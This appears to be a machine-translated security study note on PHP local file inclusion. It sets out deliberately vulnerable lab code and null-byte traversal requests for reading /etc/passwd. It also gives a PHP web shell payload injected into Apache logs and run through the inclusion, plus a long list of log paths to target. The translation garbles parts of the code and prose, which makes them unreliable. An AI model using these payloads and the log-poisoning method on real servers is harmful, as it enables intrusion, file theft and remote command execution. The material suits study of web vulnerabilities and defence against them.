PHP local file inclusion (LFI) Vulnerability

The main reference of this study is: http://downloads.ackack.net/LocalFileInclusion.pdf
 
Lab code:
 
In linux, directly submit: test. php? For =/etc/passwd % 00 to display the file.
 
<? Php
Include ($ _ GET ['for']. '. php'); // used to test the local Inclusion Vulnerability
?>
 
 
 
If it is on win, submit: test. php? For = D: \ tools \ readme.txt % 00. It should be noted that for too many ".. \", 360 will automatically intercept, the better way is to use ie or ff.
 
However, browsing files alone is not enough. We also need webshell. You can use the log injection method. This is also the main purpose of my record, which is the key point.
 
Here, the core of the idea is to inject php code into the log. For example, we can:
 
<? Php $ s =$ _ GET; @ chdir ($ s ['X']); echo @ system ($ s ['y'])?>
 
Injection in (automatic browser changes are too annoying ). Note: friddle2 does not filter access to the local machine. I will enter the address of the Local Machine: 192.168.0.1.
 
Then access: test. php? For =/var/log/apache/logs/error_log % 00 & x =/& y = uname, which is for linux. If the platform switches to win, you can access: test. php? For = .. \ apache \ logs \ error. log % 00 & x =. y = dir, the current directory file is displayed.
 
Of course, we can also record the log to access. log, but it will be more complicated, because the file to be included will be larger.
 
References also mentioned: I am not familiar with linux's/proc/self/fd injection method, so I have not looked at it carefully. I will learn more when I need it later.
 
Additional findings:
 
360 the browser has a strange feature. when accessing Program files \ 360se \ tools to see if there is any such folder, is there a problem here? TDH
 
D: \ Program files \ 360se \ 360se3 \ http: \ apache \ logs \ error. log % 00 & y = dir and http: // 192.168.0.1: 88/test. php? For =... \ .. \ apache \ logs \ error. log % 00 & y = dir. How is the relationship between the two obtained?
 
Appendix:
 
1. Possible log paths,
 
/Etc/httpd/logs/access. log
/Etc/httpd/logs/access_log
/Etc/httpd/logs/error. log
/Etc/httpd/logs/error_log
/Opt/lampp/logs/access_log
/Opt/lampp/logs/error_log
/Usr/local/apache/log
/Usr/local/apache/logs
/Usr/local/apache/logs/access. log
/Usr/local/apache/logs/access_log
/Usr/local/apache/logs/error. log
/Usr/local/apache/logs/error_log
/Usr/local/etc/httpd/logs/access_log
/Usr/local/etc/httpd/logs/error_log
/Usr/local/www/logs/thttpd_log
/Var/apache/logs/access_log
/Var/apache/logs/error_log
/Var/log/apache/access. log
/Var/log/apache/error. log
/Var/log/apache-ssl/access. log
/Var/log/apache-ssl/error. log
/Var/log/httpd/access_log
/Var/log/httpd/error_log
/Var/log/httpsd/ssl. access_log
/Var/log/httpsd/ssl_log
/Var/log/thttpd_log
/Var/www/log/access_log
/Var/www/log/error_log
/Var/www/logs/access. log
/Var/www/logs/access_log
/Var/www/logs/error. log
/Var/www/logs/error_log
C: \ apache \ logs \ access. log
C: \ apache \ logs \ error. log
C: \ Program Files \ Apache Group \ Apache \ logs \ access. log
C: \ Program Files \ Apache Group \ Apache \ logs \ error. log
C: \ program files \ wamp \ apache2 \ logs
C: \ wamp \ apache2 \ logs
C: \ wamp \ logs
C: \ xampp \ apache \ logs \ access. log
C: \ xampp \ apache \ logs \ error. log

From http://kingbase.org